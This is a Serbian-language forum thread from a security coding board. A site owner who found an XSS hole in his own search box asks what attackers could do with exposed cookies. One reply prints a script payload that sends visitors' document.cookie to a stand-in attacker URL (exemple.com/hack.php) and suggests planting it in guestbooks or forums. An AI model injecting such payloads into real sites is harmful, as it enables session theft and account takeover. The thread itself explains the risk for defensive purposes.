Navigacija
Lista poslednjih: 16, 32, 64, 128 poruka.

Sta mogu sa cookie-ima...?

[es] :: Security Coding :: Sta mogu sa cookie-ima...?

[ Pregleda: 5601 | Odgovora: 4 ] > FB > Twit

Postavi temu Odgovori

Autor

Pretraga teme: Traži
Markiranje Štampanje RSS

Animal_Instinct

Član broj: 155430
Poruke: 2
*.nt.ba.



Profil

icon Sta mogu sa cookie-ima...?31.08.2007. u 15:31 - pre 202 meseci
Pravim jedno testiranje vlastite web stranice.
U search engine-u kada ukucam <SCRIPT>alert(document.cookie)</SCRIPT> izbaci mi prozor sa datim puno stranih stringova,sto ne bi trebalo naravno. Pronasao sam nacin kako da to zastitim.Medutim,ono sto me interesuje jeste sta bih mogao uraditi neko sa tim stringovima(bil' mogao nastetiti stranici) ?
 
Odgovor na temu

jorganwd
Muris Kurgaš
/dev/null

Član broj: 65537
Poruke: 779

Sajt: www.remote-exploit.org


+34 Profil

icon Re: Sta mogu sa cookie-ima...?01.09.2007. u 11:38 - pre 202 meseci
Pa recimo napadac moze da preuzme cookie i stavi ih rucno u svoj browser. Ako nadje pravi cookie (recimo tvoj admin), moze ih iskoristiti za automatsko admin prijavljivanje.
 
Odgovor na temu

feroc1ty

Član broj: 154894
Poruke: 90
80.93.231.*



Profil

icon Re: Sta mogu sa cookie-ima...?16.09.2007. u 19:48 - pre 201 meseci
Pa mozes svasta da se uradi kad ti sajt nije zasticen na xss napad
Primer:
Code:

<script>
document.location = 'http://www.exemple.com/hack.php?cookies=' + document.cookie
</script>

ako ovo gore neko ubaci u neki guestbook,forum...
svaki korisnik koji poseti tu poruku redirektovace se na tu stranicu i poslace svoje cookies napadacu
koje napadac moze kasnije da iskoristi i ulogujuje se pomocu cookia
 
Odgovor na temu

ki11erc0de
BiH

Član broj: 119883
Poruke: 43
91.191.13.*



Profil

icon Re: Sta mogu sa cookie-ima...?09.11.2007. u 00:19 - pre 200 meseci


I mene uanima kako moze.


[Ovu poruku je menjao ki11erc0de dana 10.11.2007. u 10:29 GMT+1]
 
Odgovor na temu

jorganwd
Muris Kurgaš
/dev/null

Član broj: 65537
Poruke: 779

Sajt: www.remote-exploit.org


+34 Profil

icon Re: Sta mogu sa cookie-ima...?09.11.2007. u 08:07 - pre 200 meseci
Citat:
ki11erc0de: Wireless snifovanjem takodje se moze pokupiti cookies

vrlo je jednostavno pokupiti cookies.

Ima masu takvih programa.


Bravo! Samo sto to nije tema ovdje, potpuno je drugaciji scenario.
 
Odgovor na temu

[es] :: Security Coding :: Sta mogu sa cookie-ima...?

[ Pregleda: 5601 | Odgovora: 4 ] > FB > Twit

Postavi temu Odgovori

Navigacija
Lista poslednjih: 16, 32, 64, 128 poruka.